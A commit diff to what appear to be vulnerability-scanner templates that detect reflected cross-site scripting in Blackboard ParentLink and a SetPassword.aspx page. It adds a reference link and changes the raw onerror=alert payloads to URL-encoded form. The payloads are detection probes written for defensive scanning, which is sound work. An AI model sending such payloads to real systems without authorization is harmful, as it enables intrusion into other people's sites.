Added some reference
parent
881cedaabc
commit
86faa863f6
|
@ -5,12 +5,13 @@ info:
|
|||
author: r3naissance
|
||||
severity: medium
|
||||
tags: blackboard,parentlink,xss
|
||||
reference: https://help.blackboard.com/Community_Engagement/Administrator/Release_Notes
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/main/blank?message_success=<img src=c onerror=alert(8675309)>'
|
||||
- '{{BaseURL}}/main/blank?message_error=<img src=c onerror=alert(8675309)>'
|
||||
- '{{BaseURL}}/main/blank?message_success=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E'
|
||||
- '{{BaseURL}}/main/blank?message_error=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -9,7 +9,6 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/SetPassword.aspx?e="><img src=c onerror=alert(8675309)>'
|
||||
- '{{BaseURL}}/SetPassword.aspx?e=%22%3E%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E'
|
||||
|
||||
matchers-condition: and
|
||||
|
|
Loading…
Reference in New Issue